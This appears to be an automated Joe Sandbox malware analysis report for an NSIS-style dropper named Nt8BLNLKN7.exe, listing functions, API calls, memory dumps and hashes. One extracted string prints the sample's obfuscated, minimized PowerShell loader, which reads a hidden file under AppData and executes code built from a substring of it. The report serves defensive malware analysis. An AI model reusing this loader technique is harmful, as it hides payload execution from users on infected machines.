Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
Instruction ID: 52ea2c90687e5876e605324cdef58a02bfc8c1539d376b9eaaf3b2e35a2569c6
Opcode Fuzzy Hash: 9001e84463e5b3d4dd00ca1d2e00f3bb66c1d6c16300b22364f3152d7eb201de
Instruction Fuzzy Hash: 33D0C972908520FBC2102728AD08C9BBB55EB582717018B32F865A22B0C7304C52CAA5

Function 00403695 Relevance: 2.5, APIs: 2, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,771B3410,004034D6,?), ref: 004036A7
CloseHandle.KERNEL32(FFFFFFFF,771B3410,004034D6,?), ref: 004036BB

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 2229e43d6289b38d5d47617bcce03355d5eaf097794c5503d34cf4d4932e4679
Instruction ID: 89c4926621b3ed489ac8dfb39f115d293634e1e2b72de2a3854944cb7e34118e
Opcode Fuzzy Hash: 2229e43d6289b38d5d47617bcce03355d5eaf097794c5503d34cf4d4932e4679
Instruction Fuzzy Hash: 2DE08630500620B6D530AF7CAD455463A185B41335B608B22F474F22F1C7389E875EAC

Function 00401705 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: f45795dd4039b4ac79c1b788fb08f03ac0000c29c4d50ab2925c178598d74e3b
Instruction ID: b1e2324c8c43f12db9182c34506a8a6b6d03d1e685c93adb476f6fabe5cadde0
Opcode Fuzzy Hash: f45795dd4039b4ac79c1b788fb08f03ac0000c29c4d50ab2925c178598d74e3b
Instruction Fuzzy Hash: 3CE0DFB2204100BBD740DB649D48AAB77A8EB10368F20863AE511E60C0E2B99902E229

Function 00402B07 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: ebfeba3ed9c8d95cb46d76ca19a6c1a04daa5e79448631d0a062a8db0bedbb5d
Instruction ID: 087740a894708ae54e311fe38564fcb001a0ed9e3d0f4d4a62d19f1d4de25a1d
Opcode Fuzzy Hash: ebfeba3ed9c8d95cb46d76ca19a6c1a04daa5e79448631d0a062a8db0bedbb5d
Instruction Fuzzy Hash: 38E046B6250108AADB40EFA4EE4AF9537ECFB04700F008021BA08E7091CA78E5509B69

Function 004059FA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,004128A0,0040A8A0,004031C9,00409130,00409130,004030BB,004128A0,00004000,?,00000000,?), ref: 00405A0E

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
Instruction ID: b1acdbea0b5305796381949641a39caa05877223dc774253bf026a704a199e6f
Opcode Fuzzy Hash: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
Instruction Fuzzy Hash: 3AE0E632714159ABDF109E559C41FEB779CEF05350F044532F915E6150E231E8219FA5

Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 517c991728b4920fe6c9b853d4cb973a6b5d17c3594e599704a440defafe000c
Instruction ID: bed2877986d8c12a83e01492d596720214e57a472dec7050afa6ab6fccae40cd
Opcode Fuzzy Hash: 517c991728b4920fe6c9b853d4cb973a6b5d17c3594e599704a440defafe000c
Instruction Fuzzy Hash: 17D01277B08114E7DB00DBB5AE48A9E73A4FB50325F208637D111F11D0D3B98551A629

Function 00404038 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00010420,00000000,00000000,00000000), ref: 0040404A

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
Instruction ID: af7fd4c3fc1dda8ad1a195a9021ea177fcc43fc0d0bb539f8953ea950d20d41d
Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
Instruction Fuzzy Hash: DFC09B717443007BEA31DB509D49F077758A750B00F5584357320F50D0C6B4F451D62D

Function 00404021 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403E52), ref: 0040402F

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19

Function 004031CC Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Function 0040400E Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403DEB), ref: 00404018

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: caaff2729d3fe7bae5ae998927534049a5cfce9e2193b3926e4c56a419af128c
Instruction ID: f87940b9544c4de7e657a104dd6f20edac94ef916c9b89b279468f5034d51d6a
Opcode Fuzzy Hash: caaff2729d3fe7bae5ae998927534049a5cfce9e2193b3926e4c56a419af128c
Instruction Fuzzy Hash: E2A01231404001DBCB014B10DF04C45FF21B7503007018030E50140034C6310420FF09

Non-executed Functions

Function 00404959 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404971
GetDlgItem.USER32(?,00000408), ref: 0040497C
GlobalAlloc.KERNEL32(00000040,?), ref: 004049C6
LoadBitmapA.USER32(0000006E), ref: 004049D9
SetWindowLongA.USER32(?,000000FC,00404F50), ref: 004049F2
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A06
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A18
SendMessageA.USER32(?,00001109,00000002), ref: 00404A2E
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A3A
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A4C
DeleteObject.GDI32(00000000), ref: 00404A4F
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A7A
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A86
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B1B
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B46
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B5A
GetWindowLongA.USER32(?,000000F0), ref: 00404B89
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B97
ShowWindow.USER32(?,00000005), ref: 00404BA8
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404CA5
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D0A
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D1F
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D43
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D63
ImageList_Destroy.COMCTL32(00000000), ref: 00404D78
GlobalFree.KERNEL32(00000000), ref: 00404D88
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E01
SendMessageA.USER32(?,00001102,?,?), ref: 00404EAA
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EB9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404ED9
ShowWindow.USER32(?,00000000), ref: 00404F27
GetDlgItem.USER32(?,000003FE), ref: 00404F32
ShowWindow.USER32(00000000), ref: 00404F39

Strings

, xrefs: 00404F11
M, xrefs: 00404B02
N, xrefs: 00404BE3

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 053b7ab7fa00b04d0007377cc01b8b92edfe404da863458ea4911086e25be11d
Instruction ID: 292d5c244ab645820c7f02bed8ff3f2a610eed88cba0887a0da166436049191d
Opcode Fuzzy Hash: 053b7ab7fa00b04d0007377cc01b8b92edfe404da863458ea4911086e25be11d
Instruction Fuzzy Hash: A10250B0900209AFEF109F54DC85AAE7BB5FB84315F10817AFA11B62E1D7789E42DF58

Function 0040442A Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 264stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404479
SetWindowTextA.USER32(00000000,?), ref: 004044A3
SHBrowseForFolderA.SHELL32(?,0041F0D0,?), ref: 00404554
CoTaskMemFree.OLE32(00000000), ref: 0040455F
lstrcmpiA.KERNEL32(004226A0,reckling: Installing), ref: 00404591
lstrcatA.KERNEL32(?,004226A0), ref: 0040459D
SetDlgItemTextA.USER32(?,000003FB,?), ref: 004045AF

Part of subcall function 004054E9: GetDlgItemTextA.USER32(?,?,00000400,004045E6), ref: 004054FC

Part of subcall function 00405F5C: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Nt8BLNLKN7.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031EF,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033C9), ref: 00405FB4
Part of subcall function 00405F5C: CharNextA.USER32(?,?,?,00000000), ref: 00405FC1
Part of subcall function 00405F5C: CharNextA.USER32(?,"C:\Users\user\Desktop\Nt8BLNLKN7.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031EF,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033C9), ref: 00405FC6
Part of subcall function 00405F5C: CharPrevA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004031EF,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033C9), ref: 00405FD6

GetDiskFreeSpaceA.KERNEL32(0041ECC8,?,?,0000040F,?,0041ECC8,0041ECC8,?,00000000,0041ECC8,?,?,000003FB,?), ref: 0040466A
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404685
SetDlgItemTextA.USER32(00000000,00000400,0041ECB8), ref: 004046FE

Strings

A, xrefs: 0040454D
C:\Users\user\AppData\Roaming\supersystem\panelet, xrefs: 0040457A
"Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) , xrefs: 00404443
reckling: Installing, xrefs: 00404527, 0040458A

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: "Powershell.exe" -windowstyle minimized "$Lejevrdier = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Nonambiguity.Ove' ; $Tnksommes=$Lejevrdier.SubString(73043,3);.$Tnksommes($Lejevrdier) $A$C:\Users\user\AppData\Roaming\supersystem\panelet$reckling: Installing
API String ID: 2246997448-286993551
Opcode ID: 476c68135541f7995d7e7312d009b35f143366a4d6393fc4d548ff83450bdccd
Instruction ID: 255f07ea732f9d77aa63c61f9e9bd72d052a515538c5e386bff86aa800b3dd0f
Opcode Fuzzy Hash: 476c68135541f7995d7e7312d009b35f143366a4d6393fc4d548ff83450bdccd
Instruction Fuzzy Hash: 5A9172B1900219BBDB11AFA1CD85AAF76B8EF85304F10843BFB01B72D1D77C99418B69

Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040208B
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407374,?,?), ref: 00402143

Strings

C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Detraque\Tykkerterne155, xrefs: 004020CB

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\supersystem\panelet\Kompilator\Detraque\Tykkerterne155
API String ID: 123533781-4105336555
Opcode ID: 844d7db231ce930ba87aa91d55221135eb66824421c535283c4cff4e72d9e9e5
Instruction ID: 8923a1fbb4e768f6885cfedd98bdb4ab1c3b58066d3a845fdfa0f70482a78e56
Opcode Fuzzy Hash: 844d7db231ce930ba87aa91d55221135eb66824421c535283c4cff4e72d9e9e5
Instruction Fuzzy Hash: 02416D71A00209BFCB40DFA4CE88E9E7BB5BF48354B2042A9F911FB2D1D6799D41DB54

Function 00404135 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 205windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041C0
GetDlgItem.USER32(00000000,000003E8), ref: 004041D4
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041F2
GetSysColor.USER32(?), ref: 00404203
